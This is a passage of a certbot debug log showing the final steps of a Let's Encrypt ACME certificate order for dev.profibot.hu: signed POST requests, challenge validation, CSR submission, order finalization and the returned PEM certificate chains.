"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWFWUlBVZWlKMmJGNm83dWpLZFFQZ0Fuc0NRSWZJck9ySU90d3JxeGZBaWsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "VH89JwkX4dw0qOKgaFoa1yE2_ntQwQVtFC95TUbtZI5HpU86o_q1KRBuqH7CeuhnicFV0SzwdheTKUIJtmCD0CIx-DfVD-TBLkKJPAzz8eKrP_pgxHn65ZkLDKbxWhRn0iW2HBWJciTiKvOK94uAuxc64XbqjLwjm4d0G8X9yZh_lBS_ugeqDvwVqzFmV8DCJiLr30P87qeHm37NyzWFNsKbe8aMv77otreWoQV9tCG7h3vozHpo-HmNKXJKw9DWBLGPhn2EPyPH-2OiH-Z-pII5yfXD532Jxesz6UPI0HcNfAAIrQ0yJCWlFtoYIDOffXuldjqyZe_zP8DC98TFFw", + "payload": "" +} +2025-12-24 22:16:02,244:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 823 +2025-12-24 22:16:02,245:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:16:02 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJpeDfrpAM0dmvvQvTh-1eYLjce9iApCluSM3NZArFi88 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T22:15:03Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/N1TSAA", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q", + "status": "pending", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY" + } + ] +} +2025-12-24 22:16:02,245:DEBUG:acme.client:Storing nonce: fULB7aUJpeDfrpAM0dmvvQvTh-1eYLjce9iApCluSM3NZArFi88 +2025-12-24 22:16:02,246:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/XHbT_Q', 'status': 'pending', 'token': '9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY'} +2025-12-24 22:16:05,247:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:16:05,250:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnBlRGZycEFNMGRtdnZRdlRoLTFlWUxqY2U5aUFwQ2x1U00zTlpBckZpODgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTM1MDc0NTU2In0", + "signature": "QY8sCWh2bVbd9aZqxAvISsgbTH1hukVzo-5NQL2XLrkWb7Z2ad2LTjCM18YnAsD9egwr5RwiXpLB3LbaNfOVFCAAuv3tXLbowuy1TgFDZPcqGoaUO1Bh5cnlb0RvxJRd7OO_HartRju328EnIuzxLgL8EGpUdfoURGE5sVetOSPKFx4mVnnLd5i_EHH1by9sMp9QtjBiqP_5zZvrAjMHpTXqBYtEIJ-VjJYLfW3QErPVfTJVy6fM-pA-6P89rBMvSympgpwRaezNob08eZMfww34YZRayMyuPvaM9n-HTDG6VUgmuQdL28mRNGzb-58ilvHeVveBttTIIFtECdH0Fg", + "payload": "" +} +2025-12-24 22:16:05,405:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632535074556 HTTP/1.1" 200 770 +2025-12-24 22:16:05,406:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:16:05 GMT +Content-Type: application/json +Content-Length: 770 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJQaf52UUUcwJG4W5hdS-chyJHpAan1oghhwMwc1pqcnA +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "dev.profibot.hu" + }, + "status": "valid", + "expires": "2026-01-23T22:16:05Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632535074556/FDGz7g", + "status": "valid", + "validated": "2025-12-24T22:15:03Z", + "token": "9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY", + "validationRecord": [ + { + "url": "http://dev.profibot.hu/.well-known/acme-challenge/9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY", + "hostname": "dev.profibot.hu", + "port": "80", + "addressesResolved": [ + "92.249.165.228" + ], + "addressUsed": "92.249.165.228" + } + ] + } + ] +} +2025-12-24 22:16:05,406:DEBUG:acme.client:Storing nonce: fULB7aUJQaf52UUUcwJG4W5hdS-chyJHpAan1oghhwMwc1pqcnA +2025-12-24 22:16:05,407:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-24 22:16:05,407:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-24 22:16:05,408:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/9eUTmk0WznV2eYd4lgYHVMg8NBnIvbcNO0Dtg6VxWwY +2025-12-24 22:16:05,408:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-24 22:16:05,409:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBJjCBrAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEVuITR6yGWLJbUia5\naheimDj7pXdv96vJrXQGKONfHJJ4hbfd5/YIHdS+vwc8pmFgV3+JV0Ub+91nuCJm\n0MPvIJt7NKfvtkBKNZ2Yijli4858ibsaObS8f3w+q1FULe99oC0wKwYJKoZIhvcN\nAQkOMR4wHDAaBgNVHREEEzARgg9kZXYucHJvZmlib3QuaHUwCgYIKoZIzj0EAwID\naQAwZgIxAJlcDdwS3I8vpO8hLf/KV3amltmS4Jp73IC9/77dfy5AFq+4++ApTHIx\nArIBiI1H9wIxAM+PdE1T6Drz+iiiMzEYzZuNA4FKYac09RResUCx55aSl5O6SvFE\nDIIvao+lXVCvUQ==\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2025-12-24 22:16:05,409:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2025-12-24 22:17:35.409927 +2025-12-24 22:16:05,410:DEBUG:acme.client:JWS payload: +b'{\n "csr": "MIIBJjCBrAIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEVuITR6yGWLJbUia5aheimDj7pXdv96vJrXQGKONfHJJ4hbfd5_YIHdS-vwc8pmFgV3-JV0Ub-91nuCJm0MPvIJt7NKfvtkBKNZ2Yijli4858ibsaObS8f3w-q1FULe99oC0wKwYJKoZIhvcNAQkOMR4wHDAaBgNVHREEEzARgg9kZXYucHJvZmlib3QuaHUwCgYIKoZIzj0EAwIDaQAwZgIxAJlcDdwS3I8vpO8hLf_KV3amltmS4Jp73IC9_77dfy5AFq-4--ApTHIxArIBiI1H9wIxAM-PdE1T6Drz-iiiMzEYzZuNA4FKYac09RResUCx55aSl5O6SvFEDIIvao-lXVCvUQ"\n}' +2025-12-24 22:16:05,414:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462336946666: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSlFhZjUyVVVVY3dKRzRXNWhkUy1jaHlKSHBBYW4xb2doaHdNd2MxcHFjbkEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDYyMzM2OTQ2NjY2In0", + "signature": "PA986GcSGX-D_o8B05xg9xqs9_xoU7E0WnIAO85229AgKuuGmVZNJia32MYwUTk-ZuHlXgUfRaNp1IYXAj1RQhb6z0HLd-eKan_PmveURIR8dWbn3xmzTeImRL-_nRqaKQQ6DPzJoCXRM5ZhoW2qrUak-snYGJBYYxocHlxmFMPSj7o05kBSuB4x27ZjkYlnWwXomXUKWfGclK6ihW7Xa06bmL0enhWjTj_hZL82JSZbR49BbBMEh_gZNsAqGo-ekJyqBDD3WehEMuW305OxbmN24dEoNCU0zs5i4JRWVJFM-Xg5U-Oo50JxW4J-YZ9JIECyImPG6DFncbonxwIf6g", + "payload": "ewogICJjc3IiOiAiTUlJQkpqQ0JyQUlCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFVnVJVFI2eUdXTEpiVWlhNWFoZWltRGo3cFhkdjk2dkpyWFFHS09OZkhKSjRoYmZkNV9ZSUhkUy12d2M4cG1GZ1YzLUpWMFViLTkxbnVDSm0wTVB2SUp0N05LZnZ0a0JLTloyWWlqbGk0ODU4aWJzYU9iUzhmM3ctcTFGVUxlOTlvQzB3S3dZSktvWklodmNOQVFrT01SNHdIREFhQmdOVkhSRUVFekFSZ2c5a1pYWXVjSEp2Wm1saWIzUXVhSFV3Q2dZSUtvWkl6ajBFQXdJRGFRQXdaZ0l4QUpsY0Rkd1MzSTh2cE84aExmX0tWM2FtbHRtUzRKcDczSUM5Xzc3ZGZ5NUFGcS00LS1BcFRISXhBcklCaUkxSDl3SXhBTS1QZEUxVDZEcnotaWlpTXpFWXpadU5BNEZLWWFjMDlSUmVzVUN4NTVhU2w1TzZTdkZFRElJdmFvLWxYVkN2VVEiCn0" +} +2025-12-24 22:16:05,857:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/462336946666 HTTP/1.1" 200 451 +2025-12-24 22:16:05,858:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:16:05 GMT +Content-Type: application/json +Content-Length: 451 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462336946666 +Replay-Nonce: fULB7aUJwYRj7pGEKqWXmUIY6UmIPbuGX5zk6VXyMUbbK_d_F9w +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2025-12-31T22:15:03Z", + "identifiers": [ + { + "type": "dns", + "value": "dev.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462336946666", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/05fe01c15311c78a8c649e6091652d11561e" +} +2025-12-24 22:16:05,858:DEBUG:acme.client:Storing nonce: fULB7aUJwYRj7pGEKqWXmUIY6UmIPbuGX5zk6VXyMUbbK_d_F9w +2025-12-24 22:16:06,859:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:16:06,863:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462336946666: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSndZUmo3cEdFS3FXWG1VSVk2VW1JUGJ1R1g1ems2Vlh5TVViYktfZF9GOXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDYyMzM2OTQ2NjY2In0", + "signature": "AXt-qHrdI4nIDXmJuls1rxl6zhGG9k1zkkDoIbt9q0nNVoDfKVWDKyHeT4lFq1EG0my-Zcqh1l5LmJt3c8RYEibwJpp1_9QVsoQJea5qDpDE0eg8MUiQn45D3jEM-dIkGWd4WZ4gAETkRmI9eS6f6cDfetc7R5XwUlR0vY3dVn5HVFz06BqM-kBONSCPsbLLANnrcVoqdyXwwks6yfPWViq8_XLa90PKEUSh4Yj5Pus_QOClyzmu2BsSTIm0bnns_5SBonTIMQX2I5hwmOZwfMwdiR_CZj-UAQGCQ9tmhiZgmOOP8tu_YFCbNLklVTpLgNJbKJi409-fXmPu4ggtqQ", + "payload": "" +} +2025-12-24 22:16:07,081:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/462336946666 HTTP/1.1" 200 451 +2025-12-24 22:16:07,082:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:16:06 GMT +Content-Type: application/json +Content-Length: 451 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462336946666 +Replay-Nonce: 58tS3qjEuFSXHnZK_kQqTbQL64Kr0Zf_augHsoONbscHZTiB10k +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2025-12-31T22:15:03Z", + "identifiers": [ + { + "type": "dns", + "value": "dev.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632535074556" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462336946666", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/05fe01c15311c78a8c649e6091652d11561e" +} +2025-12-24 22:16:07,082:DEBUG:acme.client:Storing nonce: 58tS3qjEuFSXHnZK_kQqTbQL64Kr0Zf_augHsoONbscHZTiB10k +2025-12-24 22:16:07,083:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:16:07,087:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/05fe01c15311c78a8c649e6091652d11561e: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXVGU1hIblpLX2tRcVRiUUw2NEtyMFpmX2F1Z0hzb09OYnNjSFpUaUIxMGsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDVmZTAxYzE1MzExYzc4YThjNjQ5ZTYwOTE2NTJkMTE1NjFlIn0", + "signature": "OSI32lukhGekq3o0Ym5MeTHlyPlGD9SIQZj7rZPImtsMgGvUTx72VDsEE9rXC4Do75FKLetWlOijeKYMmTWXK1clcZ8whkm_fvIO0WORtrXtqHhT81WMtlsllscBuKRlRJVw4qyikafu-Z8KhzKIY4Ly7G2CJ1XtyvMRdD00dR19K9MuDQSOfiP-ZorWrUg6UUkM7SwK55MDc24TSmPWclja3xQPSojItNRbMiBt0BL94psbPvWtu1fTr6E6ztrqauG9qiNBujzw57C4HLjaKtqNT-dE5HIFij1VCdSF9BlDvAve9bmnijXDu086HmvbdbgYBaInlN6esxloDlxEHQ", + "payload": "" +} +2025-12-24 22:16:07,244:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/05fe01c15311c78a8c649e6091652d11561e HTTP/1.1" 200 2897 +2025-12-24 22:16:07,245:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:16:07 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2897 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: fULB7aUJ_AqSIONMN4hW-Hmvz_aoIxey3VTDT061ACr-jYobOPg +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDqjCCAzCgAwIBAgISBf4BwVMRx4qMZJ5gkWUtEVYeMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNTEyMjQyMTE3MzVaFw0yNjAzMjQyMTE3MzRaMBoxGDAWBgNVBAMTD2Rl +di5wcm9maWJvdC5odTB2MBAGByqGSM49AgEGBSuBBAAiA2IABFbiE0eshliyW1Im +uWoXopg4+6V3b/erya10BijjXxySeIW33ef2CB3Uvr8HPKZhYFd/iVdFG/vdZ7gi +ZtDD7yCbezSn77ZASjWdmIo5YuPOfIm7Gjm0vH98PqtRVC3vfaOCAh8wggIbMA4G +A1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYD +VR0TAQH/BAIwADAdBgNVHQ4EFgQUC2R6ChnaSs7VCRfoOKRST+8Tl4MwHwYDVR0j +BBgwFoAUrkie3IcdRKBv2qLlYHQEeMKcAIAwMgYIKwYBBQUHAQEEJjAkMCIGCCsG +AQUFBzAChhZodHRwOi8vZTcuaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD2Rldi5w +cm9maWJvdC5odTATBgNVHSAEDDAKMAgGBmeBDAECATAtBgNVHR8EJjAkMCKgIKAe +hhxodHRwOi8vZTcuYy5sZW5jci5vcmcvMzEuY3JsMIIBBgYKKwYBBAHWeQIEAgSB +9wSB9ADyAHcAFoMtq/CpJQ8P8DqlRf/Iv8gj0IdL9gQpJ/jnHzMT9foAAAGbUm8C +rQAABAMASDBGAiEArly6O33bMQm30RA9E05OHiE3uZnwKiDgGz7mkIZEDLYCIQCJ +52jsXvFwqeNbv0CsYX+IKvjIU+igYfIqJkCP63/PMAB3AA5XlLzzrqk+MxssmQez +95Dfm8I9cTIl3SGpJaxhxU4hAAABm1JvAoYAAAQDAEgwRgIhAO5TFDnaRZfJH+iD +ZfKgDWcC/r9+TCJ7p3eM9N/suhszAiEAiqQ7MplXYZ+kJOHXwm9Fljebx6KRgSJ9 +6Lj5sIyTsQAwCgYIKoZIzj0EAwMDaAAwZQIxANGb3yHYfOjsvHweY2/n1IKv56os +0j8pgNQLy8wBuMSf1+TKzO9e90ePhD+oTuYpXwIwQjaIewBjUUe6QCEB3USGGC/y +E+oQOM4J1VFZmDsD5tvngvgJyWT5mQyggczlb/Q0 +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw +TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh +cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw +WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg +RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST +CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef +QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw +gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD +ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4 +wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB +AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g +BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu +Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD +aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF +h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG +yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr +OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o +yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S +M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ +UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq +Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I +tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ +YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty ++VUwFj9tmWxyR/M= +-----END CERTIFICATE----- + +2025-12-24 22:16:07,246:DEBUG:acme.client:Storing nonce: fULB7aUJ_AqSIONMN4hW-Hmvz_aoIxey3VTDT061ACr-jYobOPg +2025-12-24 22:16:07,246:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 22:16:07,250:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/05fe01c15311c78a8c649e6091652d11561e/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSl9BcVNJT05NTjRoVy1IbXZ6X2FvSXhleTNWVERUMDYxQUNyLWpZb2JPUGciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDVmZTAxYzE1MzExYzc4YThjNjQ5ZTYwOTE2NTJkMTE1NjFlLzEifQ", + "signature": "dkeoEq4_2SKEnaAa2Ud_8WeMS00Uh9jHzwtbVKY-n6eWDtklOPM5vicwGnyAtRjAvrVXogAhxHMtu354337DJAPPflsbr0SeTWbqGuvc18d4xAzHGk7tuH60845xDcnpjwAStOACASY0fF_vQ2eiZ3FVOhqA4p50kENheJsCIkV2jN36zp-Lv-0iVIwtA-u0gj08mTTkdoLOqKRhAnOEjXGz1yU4pjlwVLaKbPSOLxUsZaQ-g7UHjFwKE8C_gOmSvS_z84dXy4LAI6T9U3SMfDK1gwzCLy4QNQwzNomKiKPJjWCGDVgBUkB8YRcZxPk9tfzRoIQK-MnftUgadMn9Fw", + "payload": "" +} +2025-12-24 22:16:07,407:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/05fe01c15311c78a8c649e6091652d11561e/1 HTTP/1.1" 200 2332 +2025-12-24 22:16:07,408:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 22:16:07 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2332 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: fULB7aUJl6BaG7DpoOchX7TcbahAWzgmCRHB8uIGzpzlajQkkeQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDqjCCAzCgAwIBAgISBf4BwVMRx4qMZJ5gkWUtEVYeMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNTEyMjQyMTE3MzVaFw0yNjAzMjQyMTE3MzRaMBoxGDAWBgNVBAMTD2Rl +di5wcm9maWJvdC5odTB2MBAGByqGSM49AgEGBSuBBAAiA2IABFbiE0eshliyW1Im +uWoXopg4+6V3b/erya10BijjXxySeIW33ef2CB3Uvr8HPKZhYFd/iVdFG/vdZ7gi +ZtDD7yCbezSn77ZASjWdmIo5YuPOfIm7Gjm0vH98PqtRVC3vfaOCAh8wggIbMA4G +A1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYD +VR0TAQH/BAIwADAdBgNVHQ4EFgQUC2R6ChnaSs7VCRfoOKRST+8Tl4MwHwYDVR0j +BBgwFoAUrkie3IcdRKBv2qLlYHQEeMKcAIAwMgYIKwYBBQUHAQEEJjAkMCIGCCsG +AQUFBzAChhZodHRwOi8vZTcuaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD2Rldi5w +cm9maWJvdC5odTATBgNVHSAEDDAKMAgGBmeBDAECATAtBgNVHR8EJjAkMCKgIKAe +hhxodHRwOi8vZTcuYy5sZW5jci5vcmcvMzEuY3JsMIIBBgYKKwYBBAHWeQIEAgSB +9wSB9ADyAHcAFoMtq/CpJQ8P8DqlRf/Iv8gj0IdL9gQpJ/jnHzMT9foAAAGbUm8C +rQAABAMASDBGAiEArly6O33bMQm30RA9E05OHiE3uZnwKiDgGz7mkIZEDLYCIQCJ +52jsXvFwqeNbv0CsYX+IKvjIU+igYfIqJkCP63/PMAB3AA5XlLzzrqk+MxssmQez +95Dfm8I9cTIl3SGpJaxhxU4hAAABm1JvAoYAAAQDAEgwRgIhAO5TFDnaRZfJH+iD +ZfKgDWcC/r9+TCJ7p3eM9N/suhszAiEAiqQ7MplXYZ+kJOHXwm9Fljebx6KRgSJ9 +6Lj5sIyTsQAwCgYIKoZIzj0EAwMDaAAwZQIxANGb3yHYfOjsvHweY2/n1IKv56os +0j8pgNQLy8wBuMSf1+TKzO9e90ePhD+oTuYpXwIwQjaIewBjUUe6QCEB3USGGC/y +E+oQOM4J1VFZmDsD5tvngvgJyWT5mQyggczlb/Q0 +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL +MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo +IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN +MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j +cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/ +vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF +HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw +DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS +BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA +gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm +MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww +CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu +b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX +lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb +Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf +-----END CERTIFICATE----- + +2025-12-24 22:16:07,415:DEBUG:acme.client:Storing nonce: 